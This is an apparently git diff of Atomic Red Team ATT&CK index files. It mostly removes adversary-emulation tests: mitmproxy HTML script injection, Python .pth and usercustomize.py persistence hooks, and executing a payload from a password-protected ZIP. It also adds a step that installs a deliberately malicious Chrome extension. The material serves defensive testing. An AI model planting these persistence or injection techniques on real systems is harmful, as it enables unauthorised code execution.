command: 'python3 "#{python_script_path}"
'
name: bash
elevation_required: false
atomic_tests: []
T1071.004:
technique:
type: attack-pattern
@@ -42566,68 +41726,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1205:
technique:
type: attack-pattern
@@ -55523,7 +54622,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -55553,7 +54652,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56690,35 +55788,7 @@ discovery:
- Windows
x_mitre_version: '1.0'
identifier: T1652
atomic_tests:
- name: Device Driver Discovery (Linux)
auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
description: 'Displays a list of loaded kernel modules on a Linux system, which
is used to enumerate drivers.
'
supported_platforms:
- linux
executor:
command: 'lsmod
'
name: bash
elevation_required: false
- name: Enumerate Kernel Driver Files (Linux)
auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
description: 'Finds and lists all kernel driver files on a Linux system in order
to provide a broader view of available drivers, not just loaded ones.
'
supported_platforms:
- linux
executor:
command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
'
name: bash
elevation_required: false
atomic_tests: []
T1087.002:
technique:
type: attack-pattern
@@ -57315,21 +56385,6 @@ discovery:
'
name: bash
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
T1040:
technique:
type: attack-pattern
@@ -59113,21 +58168,6 @@ discovery:
x_mitre_version: '2.5'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
@@ -59154,19 +58194,6 @@ discovery:
netstat
who -a
name: sh
- name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
'
supported_platforms:
- linux
executor:
name: sh
command: |
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1497:
technique:
type: attack-pattern
@@ -69516,68 +68543,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
atomics/Indexes/macos-index.yaml
+35 -435
View File
@@ -1328,10 +1328,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
@@ -1346,59 +1346,15 @@ defense-evasion:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
@@ -13604,7 +13560,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -13634,7 +13590,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -23123,7 +23078,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -23159,102 +23114,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -26454,7 +26314,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -26477,7 +26337,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -30824,6 +30683,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -30892,7 +30765,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -30913,7 +30786,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -35743,7 +35615,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -35779,102 +35651,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -36475,7 +36252,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -36505,7 +36282,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -38460,7 +38236,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -38487,7 +38263,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -38889,68 +38664,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1205:
technique:
type: attack-pattern
@@ -50527,7 +50241,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -50557,7 +50271,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -51628,34 +51341,7 @@ discovery:
- Windows
x_mitre_version: '1.0'
identifier: T1652
atomic_tests:
- name: List loaded kernel extensions (macOS)
auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
system.
'
supported_platforms:
- macos
executor:
command: 'kextstat
'
name: bash
elevation_required: false
- name: Find Kernel Extensions (macOS)
auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
description: 'Searches for kernel extension (kext) files on a macOS system.
'
supported_platforms:
- macos
executor:
command: 'kextfind
'
name: bash
elevation_required: false
atomic_tests: []
T1087.002:
technique:
type: attack-pattern
@@ -52102,17 +51788,7 @@ discovery:
- Windows
x_mitre_version: '1.6'
identifier: T1007
atomic_tests:
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
atomic_tests: []
T1040:
technique:
type: attack-pattern
